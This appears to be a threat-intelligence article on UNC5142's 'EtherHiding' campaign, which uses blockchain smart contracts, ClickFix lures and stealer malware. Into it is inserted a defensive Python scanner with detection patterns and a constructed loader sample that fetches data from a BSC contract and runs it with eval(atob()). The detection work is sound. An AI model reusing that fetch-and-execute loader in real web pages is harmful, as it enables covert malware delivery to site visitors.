A threat actor known as UNC5142 has been abusing blockchain smart contracts to facilitate the distribution of several information-stealing malware strains, such as Atomic (AMOS), Lumma, Rhadamanthys (aka RADTHIEF), and Vidar. This campaign targets both Windows and Apple macOS operating systems. UNC5142 is characterized by exploiting vulnerable WordPress websites and utilizing a technique dubbed ‘EtherHiding,’ which obscures malicious code or data by placing it on a public blockchain, specifically the BNB Smart Chain (BSC). First documented in late 2023, EtherHiding allows the malware to blend in with legitimate Web3 traffic, making the operation more resilient to detection and takedown efforts. Google Threat Intelligence Group (GTIG) reported having flagged about 14,000 web pages with injected JavaScript tied to UNC5142 as of mid-2025, suggesting a wide-ranging, indiscriminate attack.
The core mechanism of these attacks revolves around a multi-stage JavaScript downloader called CLEARSHORT, which is an assessed variant of the ClearFake framework. The attack begins with a first-stage JavaScript malware injected into compromised WordPress sites’ files or database. This script interacts with a malicious smart contract on the BSC blockchain to retrieve the second-stage payload. The smart contract, in turn, fetches an encrypted CLEARSHORT landing page from an external server, often a Cloudflare .dev page. This landing page uses the ClickFix social engineering tactic, deceiving victims into running malicious commands in the Windows Run dialog or the macOS Terminal app, ultimately leading to system infection with a stealer.
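As an added example (not code from the article or from GTIG), the snippet below is a small defender-side scanner for the first stage described above: it flags page scripts that both talk to a BSC JSON-RPC endpoint or Web3 library and dynamically execute whatever comes back. The RPC hostnames, regexes and the two embedded sample scripts are assumptions constructed for this illustration, not indicators from the report.

```python
import re

# Heuristic indicators of an EtherHiding-style first stage (assumptions for
# this example, not GTIG's IoCs): the script reaches a public BSC RPC node
# and/or a Web3 client library, references a contract address, and feeds the
# contract's response into a dynamic-execution sink.
BSC_RPC_HOSTS = ("bsc-dataseed.binance.org", "binance.org")
CONTRACT_ADDR = re.compile(r"0x[0-9a-fA-F]{40}\b")        # 20-byte EVM address
ETH_CALL = re.compile(r"\beth_call\b")                    # raw JSON-RPC read
WEB3_LIB = re.compile(r"\b(?:ethers|web3)\b", re.IGNORECASE)
DYNAMIC_EXEC = re.compile(r"\b(?:eval|Function|atob)\s*\(")

def scan_script(js: str) -> dict:
    """Return per-indicator hits for one <script> body.
    A script is marked suspicious only when it queries BSC AND executes the
    result; a legitimate dapp that merely reads chain state is not flagged."""
    hits = {
        "bsc_rpc": any(h in js for h in BSC_RPC_HOSTS),
        "eth_call": bool(ETH_CALL.search(js)),
        "contract_addresses": CONTRACT_ADDR.findall(js),
        "web3_library": bool(WEB3_LIB.search(js)),
        "dynamic_exec": bool(DYNAMIC_EXEC.search(js)),
    }
    hits["suspicious"] = (hits["bsc_rpc"]
                          and (hits["eth_call"] or hits["web3_library"])
                          and hits["dynamic_exec"])
    return hits

def scan_html(html: str) -> list:
    """Scan every inline <script> in a page (or an exported WordPress post/
    theme file) and return one hit dict per script."""
    bodies = re.findall(r"<script[^>]*>(.*?)</script>", html, re.S | re.I)
    return [scan_script(b) for b in bodies]

# Constructed samples. The address is the zero address, a placeholder only.
PLACEHOLDER_ADDR = "0x" + "0" * 40
LOADER_SAMPLE = f"""
const p = new ethers.JsonRpcProvider("https://bsc-dataseed.binance.org");
const c = new ethers.Contract("{PLACEHOLDER_ADDR}", abi, p);
c.get().then(r => eval(atob(r)));
"""
DAPP_SAMPLE = """
const provider = new ethers.JsonRpcProvider("https://bsc-dataseed.binance.org");
provider.getBalance(addr).then(b => document.getElementById("bal").textContent = b);
"""

if __name__ == "__main__":
    for name, sample in (("loader", LOADER_SAMPLE), ("dapp", DAPP_SAMPLE)):
        print(name, scan_script(sample)["suspicious"])
```

Pointing `scan_html` at theme files and exported `wp_posts` rows covers both of the injection locations the report names.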
The infection chain adapts to the target’s operating system. On Windows, the malicious command executes an HTML Application (HTA) file, which then drops a PowerShell script to fetch the final, encrypted stealer payload from platforms like GitHub or MediaFire. Crucially, this script runs the stealer directly in memory, never writing the file to disk, in order to evade defenses. In attacks observed targeting macOS users, the ClickFix decoy prompts the victim to execute a bash command in the Terminal. This command downloads a shell script, which then uses curl to retrieve the Atomic Stealer payload from a remote server, completing the infection.
Over the past year, UNC5142’s campaigns have shown considerable evolution, moving from a single-contract system to a more sophisticated three-smart contract architecture beginning in late 2024. This new design is based on the legitimate proxy pattern—a highly efficient Router-Logic-Storage setup—with each contract having a specific job. This structure provides operational agility, allowing the threat actors to rapidly update critical components like the landing page URL or decryption key by simply altering the mutable data within the smart contract, all without modifying the JavaScript on the compromised WordPress websites. This process is surprisingly cost-effective, costing only a small network fee for each update.
GTIG’s analysis of the blockchain infrastructure revealed the use of two distinct sets of smart contracts: a primary Main infrastructure established in late 2024, and a parallel Secondary infrastructure funded in early 2025. The Main infrastructure serves as the core campaign backbone, while the Secondary one appears to be a more tactical deployment, likely used to test new lures, support activity surges, or simply enhance overall resilience. Given the consistent operational tempo, the high volume of hacked websites, the frequent updates to the infection chain, and the diversity of distributed malware payloads, UNC5142 is assessed to have achieved a notable degree of success with its ongoing financially motivated operations.